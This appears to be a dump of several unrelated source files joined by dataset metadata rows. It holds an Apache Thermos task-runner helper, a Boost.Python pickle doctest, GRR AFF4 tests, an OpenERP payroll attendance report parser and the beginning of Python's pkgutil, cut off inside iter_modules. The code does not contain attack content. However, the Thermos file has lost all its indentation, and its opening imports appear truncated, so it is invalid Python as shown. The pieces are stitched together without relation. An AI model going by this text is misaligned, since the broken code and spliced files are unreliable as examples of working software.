from apache.thermos.common.path import TaskPath
from gen.apache.thermos.ttypes import ProcessState, ProcessStatus, RunnerCkpt, TaskState, TaskStatus
class TaskRunnerHelper(object):
"""
TaskRunner helper methods that can be operated directly upon checkpoint
state. These operations do not require knowledge of the underlying
task.
TaskRunnerHelper is sort of a mishmash of "checkpoint-only" operations and
the "Process Platform" stuff that started to get pulled into process.py
This really needs some hard design thought to see if it can be extracted out
even further.
"""
class Error(Exception): pass
class PermissionError(Error): pass
# Maximum drift between when the system says a task was forked and when we checkpointed
# its fork_time (used as a heuristic to determine a forked task is really ours instead of
# a task with coincidentally the same PID but just wrapped around.)
MAX_START_TIME_DRIFT = Amount(10, Time.SECONDS)
@staticmethod
def get_actual_user():
import getpass, pwd
try:
pwd_entry = pwd.getpwuid(os.getuid())
except KeyError:
return getpass.getuser()
return pwd_entry[0]
@staticmethod
def process_from_name(task, process_name):
if task.has_processes():
for process in task.processes():
if process.name().get() == process_name:
return process
return None
@classmethod
def this_is_really_our_pid(cls, process, uid, user, start_time):
"""
A heuristic to make sure that this is likely the pid that we own/forked. Necessary
because of pid-space wrapping. We don't want to go and kill processes we don't own,
especially if the killer is running as root.
process: psutil.Process representing the process to check
uid: uid expected to own the process (or None if not available)
user: username expected to own the process
start_time: time at which it's expected the process has started
Raises:
psutil.NoSuchProcess - if the Process supplied no longer exists
"""
process_create_time = process.create_time()
if abs(start_time - process_create_time) >= cls.MAX_START_TIME_DRIFT.as_(Time.SECONDS):
log.info("Expected pid %s start time to be %s but it's %s" % (
process.pid, start_time, process_create_time))
return False
if uid is not None:
# If the uid was provided, it is gospel, so do not consider user.
try:
uids = process.uids()
if uids is None:
return False
process_uid = uids.real
except psutil.Error:
return False
if process_uid == uid:
return True
else:
log.info("Expected pid %s to be ours but the pid uid is %s and we're %s" % (
process.pid, process_uid, uid))
return False
try:
process_user = process.username()
except KeyError:
return False
if process_user == user:
# If the uid was not provided, we must use user -- which is possibly flaky if the
# user gets deleted from the system, so process_user will be None and we must
# return False.
log.info("Expected pid %s to be ours but the pid user is %s and we're %s" % (
process.pid, process_user, user))
return True
return False
@classmethod
def scan_process(cls, state, process_name):
"""
Given a RunnerState and a process_name, return the following:
(coordinator pid, process pid, process tree)
(int or None, int or None, set)
"""
process_run = state.processes[process_name][-1]
user, uid = state.header.user, state.header.uid
coordinator_pid, pid, tree = None, None, set()
if uid is None:
log.debug('Legacy thermos checkpoint stream detected, user = %s' % user)
if process_run.coordinator_pid:
try:
coordinator_process = psutil.Process(process_run.coordinator_pid)
if cls.this_is_really_our_pid(coordinator_process, uid, user, process_run.fork_time):
coordinator_pid = process_run.coordinator_pid
except psutil.NoSuchProcess:
log.info(' Coordinator %s [pid: %s] completed.' % (process_run.process,
process_run.coordinator_pid))
except psutil.Error as err:
log.warning(' Error gathering information on pid %s: %s' % (process_run.coordinator_pid,
err))
if process_run.pid:
try:
process = psutil.Process(process_run.pid)
if cls.this_is_really_our_pid(process, uid, user, process_run.start_time):
pid = process.pid
except psutil.NoSuchProcess:
log.info(' Process %s [pid: %s] completed.' % (process_run.process, process_run.pid))
except psutil.Error as err:
log.warning(' Error gathering information on pid %s: %s' % (process_run.pid, err))
else:
if pid:
try:
tree = set(child.pid for child in process.children(recursive=True))
except psutil.Error:
log.warning(' Error gathering information on children of pid %s' % pid)
return (coordinator_pid, pid, tree)
@classmethod
def scan_tree(cls, state):
"""
Scan the process tree associated with the provided task state.
Returns a dictionary of process name => (coordinator pid, pid, pid children)
If the coordinator is no longer active, coordinator pid will be None. If the
forked process is no longer active, pid will be None and its children will be
an empty set.
"""
return dict((process_name, cls.scan_process(state, process_name))
for process_name in state.processes)
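  # Illustrative shape of the scan_tree() result (added comment, not part of
  # the original source); the pids are made up:
  #   {'process_1': (4321, 4322, set([4330, 4331])),  # coordinator, forked pid, children
  #    'process_2': (None, None, set())}              # everything already exited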
@classmethod
def safe_signal(cls, pid, sig=signal.SIGTERM):
try:
os.kill(pid, sig)
except OSError as e:
if e.errno not in (errno.ESRCH, errno.EPERM):
log.error('Unexpected error in os.kill: %s' % e)
except Exception as e:
log.error('Unexpected error in os.kill: %s' % e)
@classmethod
def terminate_pid(cls, pid):
cls.safe_signal(pid, signal.SIGTERM)
@classmethod
def kill_pid(cls, pid):
cls.safe_signal(pid, signal.SIGKILL)
@classmethod
def kill_group(cls, pgrp):
cls.safe_signal(-pgrp, signal.SIGKILL)
@classmethod
def _get_process_tuple(cls, state, process_name):
assert process_name in state.processes and len(state.processes[process_name]) > 0
return cls.scan_process(state, process_name)
@classmethod
def _get_coordinator_group(cls, state, process_name):
assert process_name in state.processes and len(state.processes[process_name]) > 0
return state.processes[process_name][-1].coordinator_pid
@classmethod
def terminate_process(cls, state, process_name):
log.debug('TaskRunnerHelper.terminate_process(%s)' % process_name)
_, pid, _ = cls._get_process_tuple(state, process_name)
if pid:
log.debug(' => SIGTERM pid %s' % pid)
cls.terminate_pid(pid)
return bool(pid)
@classmethod
def kill_process(cls, state, process_name):
log.debug('TaskRunnerHelper.kill_process(%s)' % process_name)
coordinator_pgid = cls._get_coordinator_group(state, process_name)
coordinator_pid, pid, tree = cls._get_process_tuple(state, process_name)
# This is super dangerous. TODO(wickman) Add a heuristic that determines
# that 1) there are processes that currently belong to this process group
# and 2) those processes have inherited the coordinator checkpoint filehandle
# This way we validate that it is in fact the process group we expect.
if coordinator_pgid:
log.debug(' => SIGKILL coordinator group %s' % coordinator_pgid)
cls.kill_group(coordinator_pgid)
if coordinator_pid:
log.debug(' => SIGKILL coordinator %s' % coordinator_pid)
cls.kill_pid(coordinator_pid)
if pid:
log.debug(' => SIGKILL pid %s' % pid)
cls.kill_pid(pid)
for child in tree:
log.debug(' => SIGKILL child %s' % child)
cls.kill_pid(child)
return bool(coordinator_pid or pid or tree)
@classmethod
def kill_runner(cls, state):
log.debug('TaskRunnerHelper.kill_runner()')
if not state or not state.statuses:
raise cls.Error('Could not read state!')
pid = state.statuses[-1].runner_pid
if pid == os.getpid():
raise cls.Error('Unwilling to commit seppuku.')
try:
os.kill(pid, signal.SIGKILL)
return True
except OSError as e:
if e.errno == errno.EPERM:
# Permission denied
return False
elif e.errno == errno.ESRCH:
# pid no longer exists
return True
raise
@classmethod
def open_checkpoint(cls, filename, force=False, state=None):
"""
Acquire a locked checkpoint stream.
"""
safe_mkdir(os.path.dirname(filename))
fp = lock_file(filename, "a+")
if fp in (None, False):
if force:
log.info('Found existing runner, forcing leadership forfeit.')
state = state or CheckpointDispatcher.from_file(filename)
if cls.kill_runner(state):
log.info('Successfully killed leader.')
# TODO(wickman) Blocking may not be the best idea here. Perhaps block up to
# a maximum timeout. But blocking is necessary because os.kill does not immediately
# release the lock if we're in force mode.
fp = lock_file(filename, "a+", blocking=True)
else:
log.error('Found existing runner, cannot take control.')
if fp in (None, False):
raise cls.PermissionError('Could not open locked checkpoint: %s, lock_file = %s' %
(filename, fp))
ckpt = ThriftRecordWriter(fp)
ckpt.set_sync(True)
return ckpt
@classmethod
def kill(cls, task_id, checkpoint_root, force=False,
terminal_status=TaskState.KILLED, clock=time):
"""
An implementation of Task killing that doesn't require a fully hydrated TaskRunner object.
Terminal status must be either KILLED or LOST state.
"""
if terminal_status not in (TaskState.KILLED, TaskState.LOST):
raise cls.Error('terminal_status must be KILLED or LOST (got %s)' %
TaskState._VALUES_TO_NAMES.get(terminal_status) or terminal_status)
pathspec = TaskPath(root=checkpoint_root, task_id=task_id)
checkpoint = pathspec.getpath('runner_checkpoint')
state = CheckpointDispatcher.from_file(checkpoint)
if state is None or state.header is None or state.statuses is None:
if force:
log.error('Task has uninitialized TaskState - forcibly finalizing')
cls.finalize_task(pathspec)
return
else:
log.error('Cannot update states in uninitialized TaskState!')
return
ckpt = cls.open_checkpoint(checkpoint, force=force, state=state)
def write_task_state(state):
update = TaskStatus(state=state, timestamp_ms=int(clock.time() * 1000),
runner_pid=os.getpid(), runner_uid=os.getuid())
ckpt.write(RunnerCkpt(task_status=update))
def write_process_status(status):
ckpt.write(RunnerCkpt(process_status=status))
if cls.is_task_terminal(state.statuses[-1].state):
log.info('Task is already in terminal state! Finalizing.')
cls.finalize_task(pathspec)
return
with closing(ckpt):
write_task_state(TaskState.ACTIVE)
for process, history in state.processes.items():
process_status = history[-1]
if not cls.is_process_terminal(process_status.state):
if cls.kill_process(state, process):
write_process_status(ProcessStatus(process=process,
state=ProcessState.KILLED, seq=process_status.seq + 1, return_code=-9,
stop_time=clock.time()))
else:
if process_status.state is not ProcessState.WAITING:
write_process_status(ProcessStatus(process=process,
state=ProcessState.LOST, seq=process_status.seq + 1))
write_task_state(terminal_status)
cls.finalize_task(pathspec)
@classmethod
def reap_children(cls):
pids = set()
while True:
try:
pid, status, rusage = os.wait3(os.WNOHANG)
if pid == 0:
break
pids.add(pid)
log.debug('Detected terminated process: pid=%s, status=%s, rusage=%s' % (
pid, status, rusage))
except OSError as e:
if e.errno != errno.ECHILD:
log.warning('Unexpected error when calling waitpid: %s' % e)
break
return pids
TERMINAL_PROCESS_STATES = frozenset([
ProcessState.SUCCESS,
ProcessState.KILLED,
ProcessState.FAILED,
ProcessState.LOST])
TERMINAL_TASK_STATES = frozenset([
TaskState.SUCCESS,
TaskState.FAILED,
TaskState.KILLED,
TaskState.LOST])
@classmethod
def is_process_terminal(cls, process_status):
return process_status in cls.TERMINAL_PROCESS_STATES
@classmethod
def is_task_terminal(cls, task_status):
return task_status in cls.TERMINAL_TASK_STATES
@classmethod
def initialize_task(cls, spec, task):
active_task = spec.given(state='active').getpath('task_path')
finished_task = spec.given(state='finished').getpath('task_path')
is_active, is_finished = os.path.exists(active_task), os.path.exists(finished_task)
if is_finished:
raise cls.Error('Cannot initialize task with "finished" record!')
if not is_active:
safe_mkdir(os.path.dirname(active_task))
with open(active_task, 'w') as fp:
fp.write(task)
@classmethod
def finalize_task(cls, spec):
active_task = spec.given(state='active').getpath('task_path')
finished_task = spec.given(state='finished').getpath('task_path')
is_active, is_finished = os.path.exists(active_task), os.path.exists(finished_task)
if not is_active:
raise cls.Error('Cannot finalize task with no "active" record!')
elif is_finished:
raise cls.Error('Cannot finalize task with "finished" record!')
safe_mkdir(os.path.dirname(finished_task))
os.rename(active_task, finished_task)
os.utime(finished_task, None)
| apache-2.0 | 3,467,253,521,211,049,000 | 35.535452 | 100 | 0.667938 | false |
dandan94/OpenGLTest | finalOpenGL/HelloGLFW/lib/boost_1_59_0/libs/python/test/pickle1.py | 46 | 1189 | # Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
r'''>>> import pickle1_ext
>>> import pickle
>>> pickle1_ext.world.__module__
'pickle1_ext'
>>> pickle1_ext.world.__safe_for_unpickling__
1
>>> pickle1_ext.world.__name__
'world'
>>> pickle1_ext.world('Hello').__reduce__()
(<class 'pickle1_ext.world'>, ('Hello',))
>>> wd = pickle1_ext.world('California')
>>> pstr = pickle.dumps(wd)
>>> wl = pickle.loads(pstr)
>>> print wd.greet()
Hello from California!
>>> print wl.greet()
Hello from California!
>>> noop = pickle1_ext.noop()
>>> try: pickle.dumps(noop)
... except RuntimeError, e: print str(e)[:55]
Pickling of "pickle1_ext.noop" instances is not enabled
'''
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print "running..."
import sys
status = run()[0]
if (status == 0): print "Done."
sys.exit(status)
| gpl-3.0 | -5,396,050,070,502,541,000 | 28 | 71 | 0.599664 | false |
ahojjati/grr | lib/aff4_objects/aff4_grr_test.py | 6 | 9733 | #!/usr/bin/env python
# Copyright 2011 Google Inc. All Rights Reserved.
"""Test the grr aff4 objects."""
import time
from grr.lib import aff4
from grr.lib import flow
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class MockChangeEvent(flow.EventListener):
EVENTS = ["MockChangeEvent"]
well_known_session_id = rdfvalue.SessionID(
flow_name="MockChangeEventHandler")
CHANGED_URNS = []
@flow.EventHandler(allow_client_access=True)
def ProcessMessage(self, message=None, event=None):
_ = event
if (message.auth_state !=
rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED):
return
urn = rdfvalue.RDFURN(message.payload)
MockChangeEvent.CHANGED_URNS.append(urn)
class AFF4GRRTest(test_lib.AFF4ObjectTest):
"""Test the client aff4 implementation."""
def setUp(self):
super(AFF4GRRTest, self).setUp()
MockChangeEvent.CHANGED_URNS = []
def testPathspecToURN(self):
"""Test the pathspec to URN conversion function."""
pathspec = rdf_paths.PathSpec(
path="\\\\.\\Volume{1234}\\", pathtype=rdf_paths.PathSpec.PathType.OS,
mount_point="/c:/").Append(
path="/windows",
pathtype=rdf_paths.PathSpec.PathType.TSK)
urn = aff4.AFF4Object.VFSGRRClient.PathspecToURN(
pathspec, "C.1234567812345678")
self.assertEqual(
urn, rdfvalue.RDFURN(
r"aff4:/C.1234567812345678/fs/tsk/\\.\Volume{1234}\/windows"))
# Test an ADS
pathspec = rdf_paths.PathSpec(
path="\\\\.\\Volume{1234}\\", pathtype=rdf_paths.PathSpec.PathType.OS,
mount_point="/c:/").Append(
pathtype=rdf_paths.PathSpec.PathType.TSK,
path="/Test Directory/notes.txt:ads",
inode=66,
ntfs_type=128,
ntfs_id=2)
urn = aff4.AFF4Object.VFSGRRClient.PathspecToURN(
pathspec, "C.1234567812345678")
self.assertEqual(
urn, rdfvalue.RDFURN(
r"aff4:/C.1234567812345678/fs/tsk/\\.\Volume{1234}\/"
"Test Directory/notes.txt:ads"))
def testClientSubfieldGet(self):
"""Test we can get subfields of the client."""
fd = aff4.FACTORY.Create("C.0000000000000000", "VFSGRRClient",
token=self.token, age=aff4.ALL_TIMES)
users = fd.Schema.USER()
for i in range(5):
folder = "C:/Users/user%s" % i
user = rdf_client.User(username="user%s" % i)
user.special_folders.app_data = folder
users.Append(user)
fd.AddAttribute(users)
fd.Close()
# Check the repeated Users array.
for i, folder in enumerate(
fd.GetValuesForAttribute("Users.special_folders.app_data")):
self.assertEqual(folder, "C:/Users/user%s" % i)
def testRegexChangeNotification(self):
"""Test the AFF4RegexNotificationRule rule."""
client_name = "C." + "0" * 16
# Create the notification rule.
rule_fd = aff4.FACTORY.Create("aff4:/config/aff4_rules/new_rule",
aff4_type="AFF4RegexNotificationRule",
token=self.token)
rule_fd.Set(rule_fd.Schema.CLIENT_PATH_REGEX("b.*"))
rule_fd.Set(rule_fd.Schema.EVENT_NAME("MockChangeEvent"))
rule_fd.Set(rule_fd.Schema.NOTIFY_ONLY_IF_NEW(0))
rule_fd.Close()
# Force notification rules to be reloaded.
aff4.FACTORY.UpdateNotificationRules()
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("a"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
worker_mock = test_lib.MockWorker(token=self.token)
while worker_mock.Next():
pass
# No notifications are expected, because path doesn't match the regex
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 0)
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
# Now we get a notification, because the path matches
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 1)
self.assertEqual(MockChangeEvent.CHANGED_URNS[0],
rdf_client.ClientURN(client_name).Add("b"))
MockChangeEvent.CHANGED_URNS = []
# Write again to the same file and check that there's notification again
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 1)
self.assertEqual(MockChangeEvent.CHANGED_URNS[0],
rdf_client.ClientURN(client_name).Add("b"))
MockChangeEvent.CHANGED_URNS = []
# Change the rule to notify only if file is written for the first time
rule_fd = aff4.FACTORY.Open("aff4:/config/aff4_rules/new_rule",
mode="rw",
token=self.token)
rule_fd.Set(rule_fd.Schema.NOTIFY_ONLY_IF_NEW, rdfvalue.RDFInteger(1))
rule_fd.Close()
# Force update of the rules in the factory
aff4.FACTORY.UpdateNotificationRules()
# Check that we don't get a notification for overwriting existing file
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 0)
# Check that we do get a notification for writing a new file
fd = aff4.FACTORY.Create(rdf_client.ClientURN(client_name).Add("b2"),
token=self.token,
aff4_type="AFF4Object")
fd.Close()
while worker_mock.Next():
pass
self.assertEqual(len(MockChangeEvent.CHANGED_URNS), 1)
self.assertEqual(MockChangeEvent.CHANGED_URNS[0],
rdf_client.ClientURN(client_name).Add("b2"))
def testVFSFileContentLastNotUpdated(self):
"""Make sure CONTENT_LAST does not update when only STAT is written.."""
path = "/C.12345/contentlastchecker"
timestamp = 1
with utils.Stubber(time, "time", lambda: timestamp):
fd = aff4.FACTORY.Create(path, "VFSFile", mode="w", token=self.token)
timestamp += 1
fd.SetChunksize(10)
      # Make lots of small writes - the length of this string and the chunk size
      # are relatively prime, to exercise the worst case.
for i in range(100):
fd.Write("%s%08X\n" % ("Test", i))
# Flush after every write.
fd.Flush()
# And advance the time.
timestamp += 1
fd.Set(fd.Schema.STAT, rdf_client.StatEntry())
fd.Close()
fd = aff4.FACTORY.Open(path, mode="rw", token=self.token)
    # Make sure the attribute was written when the write occurred.
self.assertEqual(int(fd.GetContentAge()), 101000000)
# Write the stat (to be the same as before, but this still counts
# as a write).
fd.Set(fd.Schema.STAT, fd.Get(fd.Schema.STAT))
fd.Flush()
fd = aff4.FACTORY.Open(path, token=self.token)
# The age of the content should still be the same.
self.assertEqual(int(fd.GetContentAge()), 101000000)
def testGetClientSummary(self):
hostname = "test"
system = "Linux"
os_release = "12.02"
kernel = "3.15-rc2"
fqdn = "test.test.com"
arch = "amd64"
install_time = rdfvalue.RDFDatetime().Now()
user = "testuser"
userobj = rdf_client.User(username=user)
interface = rdf_client.Interface(ifname="eth0")
timestamp = 1
with utils.Stubber(time, "time", lambda: timestamp):
with aff4.FACTORY.Create("C.0000000000000000", "VFSGRRClient", mode="rw",
token=self.token) as fd:
empty_summary = fd.GetSummary()
self.assertEqual(empty_summary.client_id, "C.0000000000000000")
self.assertFalse(empty_summary.system_info.version)
self.assertEqual(empty_summary.timestamp.AsSecondsFromEpoch(), 1)
# This will cause TYPE to be written with current time = 101 when the
# object is closed
timestamp += 100
fd.Set(fd.Schema.HOSTNAME(hostname))
fd.Set(fd.Schema.SYSTEM(system))
fd.Set(fd.Schema.OS_RELEASE(os_release))
fd.Set(fd.Schema.KERNEL(kernel))
fd.Set(fd.Schema.FQDN(fqdn))
fd.Set(fd.Schema.ARCH(arch))
fd.Set(fd.Schema.INSTALL_DATE(install_time))
fd.Set(fd.Schema.USER([userobj]))
fd.Set(fd.Schema.USERNAMES([user]))
fd.Set(fd.Schema.LAST_INTERFACES([interface]))
with aff4.FACTORY.Open("C.0000000000000000", "VFSGRRClient", mode="rw",
token=self.token) as fd:
summary = fd.GetSummary()
self.assertEqual(summary.system_info.node, hostname)
self.assertEqual(summary.system_info.system, system)
self.assertEqual(summary.system_info.release, os_release)
self.assertEqual(summary.system_info.kernel, kernel)
self.assertEqual(summary.system_info.fqdn, fqdn)
self.assertEqual(summary.system_info.machine, arch)
self.assertEqual(summary.system_info.install_date, install_time)
self.assertItemsEqual(summary.users, [userobj])
self.assertItemsEqual(summary.interfaces, [interface])
self.assertFalse(summary.client_info)
self.assertEqual(summary.timestamp.AsSecondsFromEpoch(), 101)
| apache-2.0 | 2,688,559,501,686,791,000 | 34.137184 | 80 | 0.634029 | false |
abstract-open-solutions/hr | __unported__/hr_report_payroll_attendance_summary/report/attendance_summary.py | 21 | 9460 | # -*- coding:utf-8 -*-
#
#
# Copyright (C) 2013 Michael Telahun Makonnen <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from datetime import datetime
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as OE_DATEFORMAT
from report import report_sxw
class Parser(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(Parser, self).__init__(cr, uid, name, context)
self.localcontext.update({
'get_employee_data': self.get_employee_data,
'get_worked_days': self.get_worked_days,
'get_daily_ot': self.get_daily_ot,
'get_nightly_ot': self.get_nightly_ot,
'get_restday_ot': self.get_restday_ot,
'get_holiday_ot': self.get_holiday_ot,
'get_bunch_no': self.get_bunch_no,
'get_awol': self.get_awol,
'get_sickleave': self.get_sickleave,
'get_no': self.get_no,
'get_start': self.get_start,
'get_end': self.get_end,
'lose_bonus': self.lose_bonus,
'get_paid_leave': self.get_paid_leave,
'get_employee_list': self.get_employee_list,
})
self.start_date = False
self.end_date = False
self.ee_lines = {}
self.no = 0
self.department_id = False
self.regular_hours = 8.0
def set_context(self, objects, data, ids, report_type=None):
if data.get('form', False) and data['form'].get('start_date', False):
self.start_date = data['form']['start_date']
if data.get('form', False) and data['form'].get('end_date', False):
self.end_date = data['form']['end_date']
return super(Parser, self).set_context(
objects, data, ids, report_type=report_type)
def get_employee_list(self, department_id):
ee_obj = self.pool.get('hr.employee')
ee_ids = ee_obj.search(
self.cr, self.uid, [
('active', '=', True),
'|',
('department_id.id', '=', department_id),
('saved_department_id.id', '=', department_id)
])
ees = ee_obj.browse(self.cr, self.uid, ee_ids)
return ees
def get_employee_data(self, department_id):
payslip_obj = self.pool.get('hr.payslip')
ee_obj = self.pool.get('hr.employee')
dtStart = datetime.strptime(self.start_date, OE_DATEFORMAT).date()
dtEnd = datetime.strptime(self.end_date, OE_DATEFORMAT).date()
ee_ids = ee_obj.search(
self.cr, self.uid, [
('active', '=', True),
'|',
('department_id.id', '=', department_id),
('saved_department_id.id', '=', department_id)
])
for ee in ee_obj.browse(self.cr, self.uid, ee_ids):
datas = []
for c in ee.contract_ids:
dtCStart = False
dtCEnd = False
if c.date_start:
dtCStart = datetime.strptime(
c.date_start, OE_DATEFORMAT).date()
if c.date_end:
dtCEnd = datetime.strptime(
c.date_end, OE_DATEFORMAT).date()
if (dtCStart and dtCStart <= dtEnd) and (
(dtCEnd and dtCEnd >= dtStart) or not dtCEnd
):
datas.append({
'contract_id': c.id,
'date_start': (dtCStart > dtStart
and dtCStart.strftime(OE_DATEFORMAT)
or dtStart.strftime(OE_DATEFORMAT)),
'date_end': ((dtCEnd and dtCEnd < dtEnd)
and dtCEnd.strftime(OE_DATEFORMAT)
or dtEnd.strftime(OE_DATEFORMAT)),
})
wd_lines = []
for d in datas:
wd_lines += payslip_obj.get_worked_day_lines(
self.cr, self.uid, [d['contract_id']],
d['date_start'], d['date_end'])
self.ee_lines.update({ee.id: wd_lines})
def get_start(self):
return datetime.strptime(self.start_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_end(self):
return datetime.strptime(self.end_date, OE_DATEFORMAT).strftime(
'%B %d, %Y')
def get_no(self, department_id):
if not self.department_id or self.department_id != department_id:
self.department_id = department_id
self.no = 1
else:
self.no += 1
return self.no
def get_employee_start_date(self, employee_id):
first_day = False
c_obj = self.pool.get('hr.contract')
c_ids = c_obj.search(
self.cr, self.uid, [('employee_id', '=', employee_id)])
for contract in c_obj.browse(self.cr, self.uid, c_ids):
if not first_day or contract.date_start < first_day:
first_day = contract.date_start
return first_day
def get_worked_days(self, employee_id):
total = 0.0
maxw = 0.0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORK100']:
total += float(line['number_of_hours']) / self.regular_hours
            elif line['code'] in ['MAX']:
maxw += float(line['number_of_hours']) / self.regular_hours
total += self.get_paid_leave(employee_id)
awol = self.get_awol(employee_id)
        # Take care to identify and handle employees who didn't work the
# full month: newly hired and terminated employees
#
hire_date = self.get_employee_start_date(employee_id)
term_ids = self.pool.get(
'hr.employee.termination').search(
self.cr, self.uid, [
('name', '<', self.end_date),
('name', '>=', self.start_date),
('employee_id', '=', employee_id),
('employee_id.status', 'in', [
'pending_inactive', 'inactive']),
('state', 'not in', ['cancel'])])
if hire_date <= self.start_date and len(term_ids) == 0:
if total >= maxw:
total = 26
total = total - awol
return total
def get_paid_leave(self, employee_id):
total = 0
paid_leaves = ['LVANNUAL', 'LVBEREAVEMENT', 'LVCIVIC', 'LVMATERNITY',
'LVMMEDICAL', 'LVPTO', 'LVWEDDING', 'LVSICK']
for line in self.ee_lines[employee_id]:
if line['code'] in paid_leaves:
total += float(line['number_of_hours']) / self.regular_hours
return total
def get_daily_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTD']:
total += line['number_of_hours']
return total
def get_nightly_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTN']:
total += line['number_of_hours']
return total
def get_restday_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTR']:
total += line['number_of_hours']
return total
def get_holiday_ot(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['WORKOTH']:
total += line['number_of_hours']
return total
def get_bunch_no(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['BUNCH']:
total += int(line['number_of_hours'])
return total
def get_awol(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['AWOL']:
total += float(line['number_of_hours']) / self.regular_hours
return total
def get_sickleave(self, employee_id):
total = 0
for line in self.ee_lines[employee_id]:
if line['code'] in ['LVSICK']:
total += float(line['number_of_hours']) / self.regular_hours
elif line['code'] in ['LVSICK50']:
total += float(line['number_of_hours']) * 0.5
return total
def lose_bonus(self, employee_id):
loseit = False
for line in self.ee_lines[employee_id]:
if line['code'] in ['AWOL', 'TARDY', 'NFRA', 'WARN'] and line[
'number_of_hours'
] > 0.01:
loseit = True
return loseit
| agpl-3.0 | 4,764,162,334,123,626,000 | 35.384615 | 77 | 0.526216 | false |
codepython/restcommander | play-1.2.4/python/Lib/pkgutil.py | 66 | 20001 | """Utilities to support packages."""
# NOTE: This module must remain compatible with Python 2.3, as it is shared
# by setuptools for distribution with Python 2.3 and up.
import os
import sys
import imp
import os.path
from types import ModuleType
__all__ = [
'get_importer', 'iter_importers', 'get_loader', 'find_loader',
'walk_packages', 'iter_modules',
'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',
]
def read_code(stream):
# This helper is needed in order for the PEP 302 emulation to
# correctly handle compiled files
import marshal
magic = stream.read(4)
if magic != imp.get_magic():
return None
stream.read(4) # Skip timestamp
return marshal.load(stream)
def simplegeneric(func):
"""Make a trivial single-dispatch generic function"""
registry = {}
def wrapper(*args, **kw):
ob = args[0]
try:
cls = ob.__class__
except AttributeError:
cls = type(ob)
try:
mro = cls.__mro__
except AttributeError:
try:
class cls(cls, object):
pass
mro = cls.__mro__[1:]
except TypeError:
mro = object, # must be an ExtensionClass or some such :(
for t in mro:
if t in registry:
return registry[t](*args, **kw)
else:
return func(*args, **kw)
try:
wrapper.__name__ = func.__name__
except (TypeError, AttributeError):
pass # Python 2.3 doesn't allow functions to be renamed
def register(typ, func=None):
if func is None:
return lambda f: register(typ, f)
registry[typ] = func
return func
wrapper.__dict__ = func.__dict__
wrapper.__doc__ = func.__doc__
wrapper.register = register
return wrapper
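# Illustrative sketch, not part of the original module: how simplegeneric() is
# meant to be used.  The names '_pretty' and '_pretty_list' are invented for the
# example; the explicit-assignment style mirrors how iter_importer_modules is
# registered below.
def _pretty(obj):
    """Default implementation, used when no more specific type is registered."""
    return repr(obj)
_pretty = simplegeneric(_pretty)
def _pretty_list(obj):
    """Implementation dispatched to when the first argument is a list."""
    return '[%s]' % ', '.join([_pretty(item) for item in obj])
_pretty.register(list, _pretty_list)
# _pretty(3) == '3'; _pretty([1, 2]) == '[1, 2]'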
def walk_packages(path=None, prefix='', onerror=None):
"""Yields (module_loader, name, ispkg) for all modules recursively
on path, or, if path is None, all accessible modules.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
Note that this function must import all *packages* (NOT all
modules!) on the given path, in order to access the __path__
attribute to find submodules.
'onerror' is a function which gets called with one argument (the
name of the package which was being imported) if any exception
occurs while trying to import a package. If no onerror function is
supplied, ImportErrors are caught and ignored, while all other
exceptions are propagated, terminating the search.
Examples:
# list all modules python can access
walk_packages()
# list all submodules of ctypes
walk_packages(ctypes.__path__, ctypes.__name__+'.')
"""
def seen(p, m={}):
if p in m:
return True
m[p] = True
for importer, name, ispkg in iter_modules(path, prefix):
yield importer, name, ispkg
if ispkg:
try:
__import__(name)
except ImportError:
if onerror is not None:
onerror(name)
except Exception:
if onerror is not None:
onerror(name)
else:
raise
else:
path = getattr(sys.modules[name], '__path__', None) or []
# don't traverse path items we've seen before
path = [p for p in path if not seen(p)]
for item in walk_packages(path, name+'.', onerror):
yield item
def iter_modules(path=None, prefix=''):
"""Yields (module_loader, name, ispkg) for all submodules on path,
or, if path is None, all top-level modules on sys.path.
'path' should be either None or a list of paths to look for
modules in.
'prefix' is a string to output on the front of every module name
on output.
"""
if path is None:
importers = iter_importers()
else:
